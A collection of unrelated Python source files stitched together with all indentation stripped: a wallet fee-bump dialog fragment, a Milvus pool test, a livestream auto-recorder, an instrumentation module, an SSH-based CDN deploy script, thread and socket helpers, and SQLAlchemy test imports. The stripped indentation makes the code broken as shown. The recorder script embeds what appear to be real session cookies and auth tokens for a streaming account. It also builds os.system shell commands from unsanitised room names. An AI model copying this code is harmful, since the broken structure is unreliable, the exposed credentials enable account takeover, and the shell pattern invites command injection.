grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_masternode_dialog(self):
d = MasternodeDialog(self.masternode_manager, self)
d.exec_()
def proposals_changed(self):
"""Callback for when proposals change."""
if not self.masternode_manager:
return
self.update_proposals_tab()
|
test_pool.py | import threading
import pytest
from milvus import Milvus, NotConnectError, VersionError
from milvus.client.pool import ConnectionPool
class TestPool:
def test_pool_max_conn(self):
pool = ConnectionPool(uri="tcp://127.0.0.1:19530", pool_size=10)
def run(_pool):
conn = _pool.fetch()
assert conn.conn_id() < 10
conn.has_collection("test_pool")
thread_list = []
for _ in range(10 * 3):
thread = threading.Thread(target=run, args=(pool,))
thread.start()
thread_list.append(thread)
def test_pool_from_stub(self):
client = Milvus(uri="tcp://127.0.0.1:19530", pool_size=10)
def run(_client):
_client.has_collection("test_pool")
thread_list = []
for _ in range(10 * 3):
thread = threading.Thread(target=run, args=(client,))
thread.start()
thread_list.append(thread)
@pytest.mark.skip
def test_pool_args(self):
with pytest.raises(NotConnectError):
ConnectionPool(uri="tcp://123.456.780.0:9999", pool_size=10, try_connect=True)
with pytest.raises(NotConnectError):
ConnectionPool(uri="tcp://123.456.780.0:9999", pool_size=10, try_connect=False)
|
strd_test.py | import os,random,asyncio,traceback
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
os.system("cd /root/b/d/d;mv *flv /root/b;cd /root/b/d/huya;mv *mp4 /root/b")
import time
import re
import requests
import threading
import sys
import json
import toml
from mail import send_mail
tryy = input('test?')
password = input('password:')
proxies = {}
justone = 1
dRooms = []
hRooms = []
hrecording = []
drecording = []
dpath = None
status = []
ss = requests.session()
ss.keep_alive = False
islogin = 0
sended = 0
dcookies_raw = '''Hm_lpvt_e99aee90ec1b2106afe7ec3b199020a7=1582781071; Hm_lvt_e99aee90ec1b2106afe7ec3b199020a7=1582775420,1582779677; dy_did=b3eabab7bce9386ba96de9c600071501; acf_did=b3eabab7bce9386ba96de9c600071501; dy_auth=4a4cul%2FxmwaKex3A3V6MNXtJUB5k%2F5LZFL6C%2FsRP%2B3Zwj9YVc0vxFlfKPgC28yw9uLDr2iEO2QigHH4jq0x033Oh2bwCMsfy7IdvA3eDswMb4sG%2B2ZjYDAdxmezB; smidV2=20200227120001377cbf560207cfb17d37a526a0cda3b200eb03c6acf42a4c0; wan_auth37wan=b3e8e47148393416M%2F2CXWe%2Fc%2Bku3LqGKSjs11iozVaXEwS9E%2B7aT4uiHjxM084feIbqA%2B3CFASdUphbSg4rvoYatahnsmdu%2FowXclxBsc8bOl2q; acf_auth=6c7fgcAk9TOh%2B5MzcmV13%2FL04O0%2BkSr3oQ4E3HRmgqQxpE1QZvVxQfvrsNOj7Hre8jRurM3QDXRMeEMbFJa9Ruth8o0K5h8sRoMrkzgp%2BBRA4EvHBfXHrs8vNbzD; acf_avatar=https%3A%2F%2Fapic.douyucdn.cn%2Fupload%2Favatar%2F005%2F55%2F00%2F12_avatar_; acf_biz=1; acf_ct=0; acf_groupid=1; acf_ltkid=45649582; acf_nickname=Miloxin; acf_own_room=0; acf_phonestatus=1; acf_stk=741d2e29fed30476; acf_uid=5550012; acf_username=auto_7NcKZj9sbL; PHPSESSID=ov73opef8fn6edi9n5n6bb9r55'''
def get_cookies(cookie_raw):
return dict(line.split("=", 1) for line in cookie_raw.split("; "))
dcookies = get_cookies(dcookies_raw)
def get_headers(header_raw):
return dict(line.split(": ", 1) for line in header_raw.split("\n"))
def delete_proxy(proxy):
return ss.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def get_proxy():
return requests.get("http://127.0.0.1:5010/get").json().get("proxy")
class Room():
def __init__(self,nRoom=None,nDomain =None):
self.nRoom = int(nRoom or 0)
self.nDomain = nDomain
self.thread = None
self.sameid = 1
self.ex = 0
class aerror(Exception):
pass
def huyad(c,m):
try:
if m in hrecording:
return
else:
hrecording.append(m)
os.system('ykdl www.{}.com/{} -o /root/b/d/huya'.format(c,m))
except:
pass
finally:
if m in hrecording:
hrecording.remove(m)
def youd(c,m):
global dpath
#while True:
print('www.%s.com/%s -o %s' % (c,m,dpath))
try:
if m in drecording:
return
else:
drecording.append(m)
os.system('ykdl www.{}.com/{} -o {} -t 20'.format(c,m,dpath))
except:
pass
finally:
if m in drecording:
drecording.remove(m)
# finally:
# time.sleep(20)
def huod(c,m):
# while True:
try:
os.system('lulu www.{}.com/{} -o /root/b/d/d'.format(c,m))
except:
pass
# finally:
# time.sleep(20)
def upload():
print('ไธไผ ่ฟ็จๅผๅง')
while True:
os.system('cd /root/b;bash do.sh')
time.sleep(10)
def checkuser():
global dRooms
global hRooms
while True:
#print('check run')
for i in open("duser.txt","r").read().splitlines():
if(i):
sameid = 0
for room in dRooms:
if(int(i) == room.nRoom):
sameid =1
room.ex = 1
#room.sameid = 1
break
if(sameid == 1):
continue
else:
print('find new id:%s.' % i)
room = Room(int(i),'douyu');
room.sameid = 1
room.ex = 1
#room.getInfo();
dRooms.append(room)
for room in dRooms:
if(room.ex == 0):
print("{}end".format(room.nRoom))
dRooms.remove(room)
room.sameid = 0
room.ex = 0
for i in open("huser.txt","r").read().splitlines():
if(i):
sameid = 0
for room in hRooms:
if(int(i) == room.nRoom):
sameid =1
room.ex = 1
#room.sameid = 1
break
if(sameid == 1):
continue
else:
print('find new id:%s.' % i)
room = Room(int(i),'huya');
room.sameid = 1
room.ex = 1
#room.getInfo();
hRooms.append(room)
for room in hRooms:
if(room.ex == 0):
print("{}end".format(room.nRoom))
hRooms.remove(room)
room.sameid = 0
room.ex = 0
time.sleep(5)
def gethtml(s,url):
res = s.get(url,timeout=(5,6))
data = res.json()
res.close()
return data
def huyastatus(hs,thread_pool=None):
global islogin
global sended
check_url = 'http://i.huya.com/udb_web/udbport2.php?m=HuyaHome&do=checkLogin'
searchurl = 'https://fw.huya.com/dispatch?do=subscribeList&uid=1199513272235&page=1&pageSize=1000'
runtime = 1
while 1:
try:
if runtime > 0:
data = gethtml(hs,check_url)
check = data['isLogined']
runtime = -2
if check:
try:
rjson = gethtml(hs,searchurl)
if rjson.get('result'):
data = rjson['result']
dlist = data['list']
liveCount = data['liveCount']
livecheck = 0
for i in dlist:
if i['isLive']:
livecheck+=1
if i['profileRoom'] not in hrecording:
down = threading.Thread(target=huyad,args=('huya',i['profileRoom'],),name=str(i['nick']),daemon=True)
down.start()
if livecheck>=liveCount:
break
else:
print('huya no result',rjson)
except:
check = 0
else:
sys.stdout.write(f"\r\033[K่็ๆช็ปๅฝ")
hcookies_raw = toml.load("/root/u/huya.conf")['hcookies_raw']
hcookies=get_cookies(hcookies_raw)
temp_s = requests.session()
hs.cookies = temp_s.cookies
hs.cookies.update(hcookies)
f = open('huser.txt')
namelist = f.read().splitlines()
f.close()
for name in namelist:
if name not in hrecording:
url = 'https://www.huya.com/'+name
try:
with hs.get(url,timeout=10) as r:
html = r.text
if 'ๅๅ๏ผ่็ๅๆพไธๅฐ่ฟไธชไธปๆญ' in html:
print(name,'ไธๅญๅจ')
else:
isOn = re.findall(r'\"isOn\":(.+?),',html)[0]
if isOn == 'true':
if name not in hrecording:
down = threading.Thread(target=huyad,args=('huya',name,),name=name+'record',daemon=True)
down.start()
except:
traceback.print_exc()
islogin = 0
print(name,'ๅบ้')
runtime+=1
except Exception as e:
print("huya Error:",e)
traceback.print_exc()
sys.stdout.write(f'\r\033[Khuyastatus')
time.sleep(random.randint(5,10))
def douyustatus(ds,thread_pool=None):
global dRooms
global justone
global dcookies
#print('run')
#url = 'https://www.douyu.com/wgapi/livenc/liveweb/followlist/0?sort=0&cid1=0'
url = "https://www.douyu.com/wgapi/livenc/liveweb/follow/list?sort=0&cid1=0"
cookies = requests.utils.dict_from_cookiejar(ds.cookies)
with open("/root/u/dscookies.txt", "w") as fp:
json.dump(cookies, fp)
while 1:
try:
#json = await loop.run_in_executor(thread_pool,functools.partial(gethtml,ds,url))
rjson = gethtml(ds,url)
data = rjson['data']
dlist = data['list']
for i in dlist:
if i['show_status'] == 1:
if i['room_id'] not in drecording:
print(f"ๅผๅงไธ่ฝฝ{i['room_id']},{i['nickname']}")
down = threading.Thread(target=youd,args=('douyu',i['room_id'],),name=str(i['nickname']),daemon=True)
down.start()
except Exception as e:
if 'time' in str(e):
print('่ทๅjson่ถ
ๆถ,้่ฏ')
continue
print("่ทๅjsonๅคฑ่ดฅ",e)
try:
if tryy:
print('douyuๅผๅง้็ปๅฝ')
#dcookies = {"Cookie": "dy_did=8242408a3b65feb390623d6c00081501; smidV2=2019051418520294dca99b6773cfe1c2a03077977c1b0d007f7dac9e8893840; acf_did=8242408a3b65feb390623d6c00081501; PHPSESSID=tgvun5c1ci6c3ltnt7s1okkgc4; acf_auth=a3ecVlfGOE71GvSS26fxTjpC0g2rpMvwCuyrPEAy%2BfoWUaTL6sDxmROq3AFY3NzP5hPaMctHzoVucMxtZwx1I2vjdCExw7r7IzfyTMh8VGMldrKDfVhJVfseCuuM; wan_auth37wan=e055eff5b144Id8mxDNxZ5PDOrybYQkr8CSHWmP92V%2FtpUNgjRRfcXeR4YInW2os3cNzjH04cZNauAFh9dyNkHcfE1HV%2FKP64R05tCA8uXzxrIZz; acf_uid=5550012; acf_username=auto_7NcKZj9sbL; acf_nickname=Miloxin; acf_own_room=0; acf_groupid=1; acf_phonestatus=1; acf_avatar=https%3A%2F%2Fapic.douyucdn.cn%2Fupload%2Favatar%2F005%2F55%2F00%2F12_avatar_; acf_ct=0; acf_ltkid=45649574; acf_biz=1; acf_stk=68f690a62d404465; Hm_lvt_e99aee90ec1b2106afe7ec3b199020a7=1569768125,1569768354,1570418236,1570418291; Hm_lpvt_e99aee90ec1b2106afe7ec3b199020a7=1570418291; LTP0=f59ad3EDaPuUGY1EQxElM%2BObWmUwxNR09ZsFcIg980X5xWYI3rNT6FiIYMerOsRDHPowpPivNRJ7vPzLQY4mHZHRMlJ5u0nk87P8NcX6xcwgEdL1Ygb8EpANCS6wWAQ4BFfimXYD5ZNNsyjdaGE4xoyb%2BNzKKLB3kiIeEhjpwM2zWlOz2NjBBMMx1m3VRJ7AQuKGk"}
#dcookies = {"cookie":"Hm_lpvt_e99aee90ec1b2106afe7ec3b199020a7=1582781071; Hm_lvt_e99aee90ec1b2106afe7ec3b199020a7=1582775420,1582779677; dy_did=b3eabab7bce9386ba96de9c600071501; acf_did=b3eabab7bce9386ba96de9c600071501; dy_auth=4a4cul%2FxmwaKex3A3V6MNXtJUB5k%2F5LZFL6C%2FsRP%2B3Zwj9YVc0vxFlfKPgC28yw9uLDr2iEO2QigHH4jq0x033Oh2bwCMsfy7IdvA3eDswMb4sG%2B2ZjYDAdxmezB; smidV2=20200227120001377cbf560207cfb17d37a526a0cda3b200eb03c6acf42a4c0; wan_auth37wan=b3e8e47148393416M%2F2CXWe%2Fc%2Bku3LqGKSjs11iozVaXEwS9E%2B7aT4uiHjxM084feIbqA%2B3CFASdUphbSg4rvoYatahnsmdu%2FowXclxBsc8bOl2q; acf_auth=6c7fgcAk9TOh%2B5MzcmV13%2FL04O0%2BkSr3oQ4E3HRmgqQxpE1QZvVxQfvrsNOj7Hre8jRurM3QDXRMeEMbFJa9Ruth8o0K5h8sRoMrkzgp%2BBRA4EvHBfXHrs8vNbzD; acf_avatar=https%3A%2F%2Fapic.douyucdn.cn%2Fupload%2Favatar%2F005%2F55%2F00%2F12_avatar_; acf_biz=1; acf_ct=0; acf_groupid=1; acf_ltkid=45649582; acf_nickname=Miloxin; acf_own_room=0; acf_phonestatus=1; acf_stk=741d2e29fed30476; acf_uid=5550012; acf_username=auto_7NcKZj9sbL; PHPSESSID=ov73opef8fn6edi9n5n6bb9r55; LTP0=19a2f2nryMtCpWOL6pDrO%2Fm37T6NLODoRXAYpRxJLNdou63Swu%2B1by5BsUKnX%2Fs8BrrmduuGLyX0VEwaysZo1lO7twpphl1AIFAOPTPLRnZQ%2BbtuCNDhvew4ZsZodHVGuWZuFGJyJpa9ThhFFFg%2BaLMXKj96Qmma2yml9%2Brjq4%2BdNVD5lZ9sc%2B97WLweNaiyRqSOs;"}
dcookies['LTP0'] = '19a2f2nryMtCpWOL6pDrO%2Fm37T6NLODoRXAYpRxJLNdou63Swu%2B1by5BsUKnX%2Fs8BrrmduuGLyX0VEwaysZo1lO7twpphl1AIFAOPTPLRnZQ%2BbtuCNDhvew4ZsZodHVGuWZuFGJyJpa9ThhFFFg%2BaLMXKj96Qmma2yml9%2Brjq4%2BdNVD5lZ9sc%2B97WLweNaiyRqSOs'
s = requests.session()
s.keep_alive=False
#print(rjson)
#headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36","Referer":"https://www.douyu.com/directory/myFollow"}
headers=ds.headers
lurl = 'https://passport.douyu.com/lapi/passport/iframe/safeAuth?client_id=1&t={t}&_={t}'.format(t=int(time.time()*1000))
res = requests.get(lurl,headers=headers,cookies=dcookies,allow_redirects=False)
if res.headers.get('Set-Cookie'):
#dcookies={"Cookie":"{}".format(dcookies['Cookie'].split("LTP0")[0]+res.headers['Set-Cookie'])}
dcookies['LTP0'] =res.headers['Set-Cookie'].split('=')[-1]
if tryy:
print(dcookies)
if res.headers.get('Location'):
llurl = 'https:'+res.headers['Location']
#s.cookies.update(dcookies)
res = s.get(llurl,headers=headers,cookies=dcookies,allow_redirects=False)
cookies = requests.utils.dict_from_cookiejar(s.cookies)
for cookie in cookies:
dcookies[cookie] = cookies[cookie]
print('็ปๅฝๅcookies',dcookies)
ds.cookies.update(dcookies)
if tryy:
print(res.headers)
#douyustatus(ds)
elif '่ฟๆ' in str(json):
subject = 'ๆ้ฑผๅบ้'
contents = 'ๆ้ฑผ็ปๅฝ่ฟๆ'
send_mail(subject,contents,password)
time.sleep(20)
cookies = requests.utils.dict_from_cookiejar(ds.cookies)
with open("/root/u/dscookies.txt", "w") as fp:
json.dump(cookies, fp)
except Exception as e:
print(e)
#if "douyu" in status:
# status.remove("douyu")
sys.stdout.write("\r\033[Kdouyustatus")
time.sleep(random.randint(0,5))
def main():
global justone
global dRooms
global dpath
global hRooms
ms = []
datas = []
dRooms = []
datas=input('่พๅ
ฅๅนณๅฐ room๏ผ').split(' ')
b = len(datas)
for i in range(b):
if datas[i].isalpha():
ms = datas[i+1].split(',')
if datas[i]=='d':
dpath=datas[i+1]
if (not os.path.exists(dpath)):
os.makedirs(dpath)
i+=1
dheaders_raw='''accept: application/json, text/plain, */*
x-dy-traceid: 4ccba279366641e3:4ccba279366641e3:0:008828
accept-language: zh-cn
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
referer: https://www.douyu.com/directory/myFollow
accept-encoding: gzip, deflate'''
dheaders=get_headers(dheaders_raw)
ds = requests.session()
ds.headers.update(dheaders)
ds.cookies.update(dcookies)
hheaders={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Accept":"*/*",
"Referer":"https://i.huya.com/",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
hcookies_raw = toml.load("/root/u/huya.conf")['hcookies_raw']
hcookies=get_cookies(hcookies_raw)
hs = requests.session()
hs.headers.update(hheaders)
hs.cookies.update(hcookies)
if tryy:
if tryy =='d':
douyustatus(ds)
elif tryy =='h':
huyastatus(hs)
sys.exit(1)
while True:
if 'douyu' not in status:
status.append("douyu")
douyu_status = threading.Thread(target=douyustatus,args=(ds,),name='douyustatus',daemon=True)
douyu_status.start()
if 'huya' not in status:
status.append("huya")
huya_status = threading.Thread(target=huyastatus,args=(hs,),name='huyastatus',daemon=True)
huya_status.start()
sys.stdout.write("\r\033[Kupdate")
time.sleep(random.randint(0,5))
if __name__ =="__main__":
main()
|
instruments.py | import time
import threading
from queue import Queue
"""Instrumentation for measuring high-level time spent on various tasks inside the runner.
This is lower fidelity than an actual profile, but allows custom data to be considered,
so that we can see the time spent in specific tests and test directories.
Instruments are intended to be used as context managers with the return value of __enter__
containing the user-facing API e.g.
with Instrument(*args) as recording:
recording.set(["init"])
do_init()
recording.pause()
for thread in test_threads:
thread.start(recording, *args)
for thread in test_threads:
thread.join()
recording.set(["teardown"]) # un-pauses the Instrument
do_teardown()
"""
class NullInstrument(object):
def set(self, stack):
"""Set the current task to stack
:param stack: A list of strings defining the current task.
These are interpreted like a stack trace so that ["foo"] and
["foo", "bar"] both show up as descendants of "foo"
"""
pass
def pause(self):
"""Stop recording a task on the current thread. This is useful if the thread
is purely waiting on the results of other threads"""
pass
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
return
class InstrumentWriter(object):
def __init__(self, queue):
self.queue = queue
def set(self, stack):
stack.insert(0, threading.current_thread().name)
stack = self._check_stack(stack)
self.queue.put(("set", threading.current_thread().ident, time.time(), stack))
def pause(self):
self.queue.put(("pause", threading.current_thread().ident, time.time(), None))
def _check_stack(self, stack):
assert isinstance(stack, (tuple, list))
return [item.replace(" ", "_") for item in stack]
class Instrument(object):
def __init__(self, file_path):
"""Instrument that collects data from multiple threads and sums the time in each
thread. The output is in the format required by flamegraph.pl to enable visualisation
of the time spent in each task.
:param file_path: - The path on which to write instrument output. Any existing file
at the path will be overwritten
"""
self.path = file_path
self.queue = None
self.current = None
self.start_time = None
self.thread = None
def __enter__(self):
assert self.thread is None
assert self.queue is None
self.queue = Queue()
self.thread = threading.Thread(target=self.run)
self.thread.start()
return InstrumentWriter(self.queue)
def __exit__(self, *args, **kwargs):
self.queue.put(("stop", None, time.time(), None))
self.thread.join()
self.thread = None
self.queue = None
def run(self):
known_commands = {"stop", "pause", "set"}
with open(self.path, "w") as f:
thread_data = {}
while True:
command, thread, time_stamp, stack = self.queue.get()
assert command in known_commands
# If we are done recording, dump the information from all threads to the file
# before exiting. Otherwise for either 'set' or 'pause' we only need to dump
# information from the current stack (if any) that was recording on the reporting
# thread (as that stack is no longer active).
items = []
if command == "stop":
items = thread_data.values()
elif thread in thread_data:
items.append(thread_data.pop(thread))
for output_stack, start_time in items:
f.write("%s %d\n" % (";".join(output_stack), int(1000 * (time_stamp - start_time))))
if command == "set":
thread_data[thread] = (stack, time_stamp)
elif command == "stop":
break
|
runCDN.py | #!/usr/bin/env python3
import subprocess
import sys
import threading
# list of all EC2 servers
EC2_SERVERS = [
'ec2-34-238-192-84.compute-1.amazonaws.com', # N. Virginia
'ec2-13-231-206-182.ap-northeast-1.compute.amazonaws.com', # Tokyo
'ec2-13-239-22-118.ap-southeast-2.compute.amazonaws.com', # Sydney
'ec2-34-248-209-79.eu-west-1.compute.amazonaws.com', # Ireland
'ec2-18-231-122-62.sa-east-1.compute.amazonaws.com', # Sao Paulo
'ec2-3-101-37-125.us-west-1.compute.amazonaws.com' # N. California
]
def run():
'''
Run scripts for the DNS and HTTP replica servers.
:return None
'''
# Checks to ensure the correct amount of arguments are included in the command call
if len(sys.argv) < 11:
raise ValueError('Insufficient command line arguments provided')
elif '-p' not in sys.argv \
or '-o' not in sys.argv \
or '-n' not in sys.argv \
or '-u' not in sys.argv \
or '-i' not in sys.argv:
raise ValueError('Missing required flags in command line arguments')
# port to connect on
p_index = sys.argv.index('-p')
port = sys.argv[p_index + 1]
# origin server
o_index = sys.argv.index('-o')
origin = sys.argv[o_index + 1]
# name of requesting website
n_index = sys.argv.index('-n')
name = sys.argv[n_index + 1]
# login username
u_index = sys.argv.index('-u')
username = sys.argv[u_index + 1]
# file/location of private key used for login
i_index = sys.argv.index('-i')
keyfile = sys.argv[i_index + 1]
# create collection to monitor server threads
replica_threads = []
# for each of the servers in the EC2 server list
for server in EC2_SERVERS:
replica_deploy = threading.Thread(target=deployReplica, args=(username, server, port, origin, keyfile))
replica_threads.append(replica_deploy)
replica_deploy.start()
# create run command for dnsserver to automatically run the executable on the dnsserver
run_dns = './dnsserver -p ' + port + ' -n ' + name + ' &>/dev/null & echo $! > dns_pid.txt\n'
exit = 'logout\n'
ssh_dest = username + '@cs5700cdnproject.ccs.neu.edu'
# commands to run in order
ssh_cmds = [run_dns, exit]
# write the command as a terminal command and run it
for cmd in ssh_cmds:
communicateSSH(cmd, keyfile, ssh_dest)
# wait for all replica deployment threads to finish
for thread in replica_threads:
thread.join()
def communicateSSH(command, keyfile, ssh_dest):
'''
Writes commands to ssh subprocess. Prints output and errors to console.
'''
subp = subprocess.Popen(['ssh', '-i', keyfile, ssh_dest],
shell=False,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = subp.communicate(command.encode())
if out:
print(out)
if err:
print(err)
def deployReplica(username, server, port, origin, keyfile):
# get the destination server (login username and server)
dest = username + '@' + server
# create run command for httpserver to automatically run the executable on the EC2 server
run_cmd = './httpserver -p ' + port + ' -o ' + origin + '&>/dev/null & echo $! > http_pid.txt\n'
logout = 'logout\n'
all_cmds = [run_cmd, logout]
# for each of the commands, take it in as a terminal command and run it
for cmd in all_cmds:
communicateSSH(cmd, keyfile, dest)
# run the Run script
run()
|
workthread.py | # -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
"""ๅทฅไฝ็บฟ็จ
"""
import time
import threading
try:
from Queue import Queue
except ImportError:
from queue import Queue
class Task(object):
"""ไปปๅก"""
def __init__(self, func, *args, **kwargs):
self._func = func
self._args = args
self._kwargs = kwargs
def run(self):
return self._func(*self._args, **self._kwargs)
class WorkThread(object):
""" """
def __init__(self):
self._thread = threading.Thread(target=self._work_thread)
self._thread.setDaemon(True)
self._run = True
self._task_queue = Queue()
self._thread.start()
def _work_thread(self):
""" """
while self._run:
if self._task_queue.empty():
time.sleep(0.1)
continue
task = self._task_queue.get()
try:
task.run()
except:
import traceback
traceback.print_exc()
def post_task(self, func, *args, **kwargs):
"""ๅ้ไปปๅก"""
task = Task(func, *args, **kwargs)
self._task_queue.put(task)
|
ConnectionProvider.py | # -*- coding: UTF-8 -*-
import socket
import threading
import SystemHelpers
class ConnectionProvider(object):
def __init__(self, destination_ip = '', server_port=20001, client_port = 20002):
self._destination_ip = destination_ip
self._server_port = server_port
self._client_port = client_port
self._buffer_size = 1024;
self._connected_socket = None
self._function_when_receive_message = print
self._function_to_alert_user = print
def set_client_port(self, port):
self._client_port = port
def set_server_port(self, port):
self._server_port = port
def set_destination_ip(self, ip):
self._destination_ip = ip
def get_connected_socket(self):
return self._connected_socket
def set_function_when_receive_message(self, function):
self._function_when_receive_message = function
def set_function_to_alert_user(self, function):
self._function_to_alert_user = function
def connected(self):
if not self._connected_socket:
return False
return True
def start_server_mode(self):
t = threading.Thread(target = self._waiting_for_connection)
t.daemon = True
t.start()
def start_connection(self):
if (not hasattr(self, '_client_socket')) or (not self.connected()) :
self._client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._client_socket.bind(('', self._client_port))
connection_stablished = True
try:
self._client_socket.connect((self._destination_ip, self._server_port))
self._connected_socket = self._client_socket
self._waiting_for_the_data()
except ConnectionRefusedError:
connection_stablished = False
message = 'Connection Refused at ' + self._destination_ip +\
':' + str(self._server_port)
if self._function_to_alert_user:
self._function_to_alert_user(message)
SystemHelpers.log_info(message)
except Exception as e:
connection_stablished = False
message = str(e)
SystemHelpers.log_debug(message)
if not connection_stablished:
self._client_socket.close()
self._connected_socket = None
return connection_stablished
return False
def send_message(self, message):
if not self._connected_socket:
return False
if type(message) == bytes:
message = message.decode()
if type(message) == str:
message = "message:"+message
message = message.encode()
self._connected_socket.sendall(message)
def close_connection(self):
if self._connection_activated:
self._connection_activated = False
self._connected_socket.close()
def _waiting_for_connection(self):
if not hasattr(self, '_server_socket'):
self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._server_socket.bind(('', self._server_port))
self._server_socket.listen(1)
conn, addr = self._server_socket.accept()
self._connected_socket = conn
self._destination_ip, self._client_port = addr
self._server_socket.close()
self._waiting_for_the_data()
def _waiting_for_the_data(self):
t = threading.Thread(target = self._waiting_for_the_data_function)
t.daemon = True
t.start()
def _waiting_for_the_data_function(self):
while self._connected_socket:
data = self._connected_socket.recv(self._buffer_size)
if not data:
self._connected_socket = None
return
if self._function_when_receive_message:
self._function_when_receive_message("received data:"+data.decode())
|
test_pool.py | import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not_
from sqlalchemy.testing import is_true
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
